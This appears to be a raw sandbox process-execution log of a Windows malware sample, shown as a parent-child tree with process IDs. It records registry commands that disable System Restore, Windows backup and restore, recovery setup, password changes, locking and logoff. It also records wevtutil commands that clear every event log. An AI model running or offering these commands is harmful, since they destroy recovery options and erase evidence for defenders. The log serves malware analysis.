C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
2⤵
PID:3844

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
3⤵
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2160

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2940

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:3796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:4036

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1564

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:2200

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:252

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:1380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:280

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:496

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:644

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:808

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:208

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:3656

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:2064

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:3360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:4016

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:2508

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1224

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1420

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:3972

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:256

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:3900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1380

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:3028

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:4020

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:3412

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:2112

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:2916

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:3628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:2264

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:2156

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:3528

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:4016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "General Logging"
3⤵
PID:3028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
3⤵
PID:2916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
3⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
3⤵
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
3⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
3⤵
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
3⤵
PID:2488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
3⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:3656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
3⤵
PID:4008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
3⤵
PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
3⤵
PID:504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
3⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
3⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
3⤵
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
3⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:4036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
3⤵
PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
3⤵
PID:504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
3⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
3⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
3⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
3⤵
PID:2488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
